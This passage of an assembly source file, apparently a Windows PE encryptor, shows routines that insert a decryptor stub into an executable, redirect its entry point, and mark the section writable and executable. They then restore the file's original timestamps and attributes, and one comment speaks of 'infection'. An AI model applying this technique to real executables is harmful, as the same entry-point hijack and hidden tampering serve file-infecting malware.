📄 75src.asm
字号:
; bug under winNT appendation.
mov ecx,dword ptr [esi+objalign] ; get object alignment
mov eax,dword ptr [edi+objvsize] ; add virtual size
add eax,dword ptr [edi+objrva] ; +last object rva
call align_fix ; set on obj alignment
mov dword ptr [esi+imagesize],eax ; save new imagesize
mov eax,originalpsize
jmp not_in_hole_psize_entry
in_hole_no_psize:
mov eax,originalvsize
not_in_hole_psize_entry:
mov [edi+objflags],0E0000060h ; set object flags r/w/x/init data
add eax,[edi+objrva] ; add last object's RVA
; eax now RVA of decryptor code
jmp new_entry
go_pe_hdr_hole:
mov eax,holeptr
sub eax,map_ptr
new_entry:
mov ebx,[esi+entrypointRVA] ; get original entry
mov [esi+entrypointRVA],eax ; put our RVA as entry
mov newep,eax ; save it for decryptor too
mov [host_eip],ebx ; save it
push esi
; CLOSED SOURCE
mov edi,map_ptr
cmp holeptr,0
jz not_hdr_hole
mov edi,holeptr
jmp copy_to_hdr
not_hdr_hole:
cmp use_hole,1 ; if in hole then install at end of vsize
jz endvsize
add edi,originalpsize ; add original physical size
jmp go_copy
endvsize:
add edi,originalvsize ; add original virtual size
go_copy:
add edi,lastobjimageoff ; add object physical offset
copy_to_hdr:
lea esi,decryptor_code ; esi->decryptor code
mov ecx,DECRYPTOR_SIZE
rep movsb
pop esi ; restore ptr pe hdr
cmp use_hole,1 ; did we find hole to install in?
jnz go_pad_fixup_size ; if no then we better pad
mov ecx,fsize ; else new filesize=old filesize
jmp go_fixup_size
go_pad_fixup_size:
mov ecx,[esi+filealign] ; calculate amt
sub ecx,DECRYPTOR_SIZE ; of padding needed
xor eax,eax
rep stosb ; pad up object to alignment
mov eax,map_ptr ; eax->beginning of mapped file
sub edi,eax ; get difference from current ptr
mov ecx,edi ; save file size
go_fixup_size:
push ecx ; ecx=real file size
call unmap ; unmap file
pop ecx
push FILE_BEGIN ; from file begin
push 0 ; distance high
push ecx ; distance low
push handle
call SetFilePointer ; move file pointer to
; real EOF
push handle
call SetEndOfFile ; set end of file
go_checksum:
;
; now we need to calculate checksum. We need to remap the file to get it
; right after file size change. I might be wrong about this, there could
; have been a bug in my code, but it seems resonable.<g>
;
xor ecx,ecx
call create_mapping
jc unmapped
call GetPEHeader
lea eax,[esi+checksum]
push eax ; destination of checksum in hdr
push offset oldchksum
push fsize ; new file size
mov eax,map_ptr
push eax
call CheckSumMappedFile
call unmap
mov error,0 ; if we made it here then no error
jmp unmapped
abort_encrypt:
call unmap ;unmap if aborted infection
unmapped:
push offset creation
push offset lastaccess
push offset lastwrite
push handle
call SetFileTime ; restore orginal file time
push handle
call CloseHandle
mov eax,oldattrib ; get original attribs
push eax
mov eax,fnameptr
push eax
call SetFileAttributesA ; restore the original attributes
ret
EncryptFile endp
;
; CLOSED SOURCE
;
test_obj proc
cmp dword ptr [eax+objpoff],0 ; make sure physical offset isn't 0
jz ret_stc
cmp dword ptr [eax+objpsize],0 ; make sure physical size isn't 0
jz ret_stc
call test_rvas
jc ret_stc
lea esi,bad_otbl ; scan thru bad obj
bobj_loop: ; table
xchg eax,ebx
lodsd
xchg eax,ebx
cmp ebx,[eax]
jz ret_stc
or ebx,ebx
jnz bobj_loop
clc
ret
ret_stc:
stc
ret
test_obj endp
test_rvas proc
pushad
mov ecx,2
lea esi,importtbl
rva_loop:
mov edx,dword ptr [esi]
mov ebx,dword ptr [eax+objrva]
cmp ebx,edx
jg not_bad
jz ret_stc2
mov ebx,dword ptr [eax+40+objrva]
or ebx,ebx
jz ret_stc
cmp ebx,edx
jg ret_stc2
not_bad:
add esi,4
loop rva_loop
popad
clc
ret
ret_stc2:
popad
stc
ret
endp
GetPEHeader proc
mov esi,[eax+3Ch] ; where PE hdr pointer is
add esi,eax
mov ptrpeheader,esi ; esi->PE Hdr
ret
GetPEHeader endp
; create_mapping - create file mapping of [handle]
; entry: ecx=+adjust mapping size
;
create_mapping proc
push ecx ; save additional mapping size
push 0 ; high fsize storage, not needed
push handle ; file handle
call GetFileSize
call test_error
jc create_abort
mov fsize,eax
pop ecx ; restore map size
push 0 ; no map name
add eax,ecx
push eax ; low size+vs
push 0 ; high size
push PAGE_READWRITE ; read&write
push 0
push handle
call CreateFileMappingA
call test_error
jc create_abort
mov maphandle,eax
push 0 ; # of bytes, 0= map entire file
push 0 ; file offset low
push 0 ; file offset high
push FILE_MAP_WRITE ; access flags - read&write
push eax ; handle
call MapViewOfFile
call test_error
jc create_abort
mov map_ptr,eax
create_abort:
ret
create_mapping endp
; test_error - test API for an error return
; entry: eax=API return
; returns: carry if error
;
test_error proc
cmp eax,-1
jz api_err
or eax,eax
jz api_err
clc
ret
api_err:
stc
ret
test_error endp
; unmap file - Unmap view of file
;
unmap proc
push map_ptr
call UnmapViewOfFile
push maphandle
call CloseHandle
ret
unmap endp
; sets eax on alignment of ecx
;
align_fix proc
xor edx,edx
div ecx ; /alignment
or edx,edx ; if no remainder then no next
jz no_adjust
inc eax ; next alignment
no_adjust:
mul ecx ; *alignment
ret
align_fix endp
OpenFile proc
push 0
push 20h ; attribute normal
push 3 ; 3=open existing file
push 0
push 0
push 0c0000000h ; permissions
push esi
call CreateFileA
ret
OpenFile endp
ifdef console_app
GetSHandle proc
push -11
call GetStdHandle
mov [hstdo],eax
push -10
call GetStdHandle
mov [hstdi],eax
ret
GetSHandle endp
WriteString proc
pushad
mov edi,ebx
xor eax,eax
mov ecx,0fffh
cld
sc_loop:
scasb ; find end of string
jz fnd
loop sc_loop
fnd:
mov ecx,edi
sub ecx,ebx
push 0
push offset byteswrote
push ecx
push ebx
push [hstdo]
call WriteConsoleA
popad
ret
WriteString endp
GetYN proc
pushad
lea edi,ynbuf
xor eax,eax
stosb
dec edi
push 0
push offset byteswrote
push 1
push edi
push [hstdi]
call ReadConsoleA
popad
cmp ynbuf,'y'
jz exit_y
cmp ynbuf,'Y'
jz exit_y
stc
ret
exit_y:
clc
ret
GetYN endp
endif
end start
ends
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -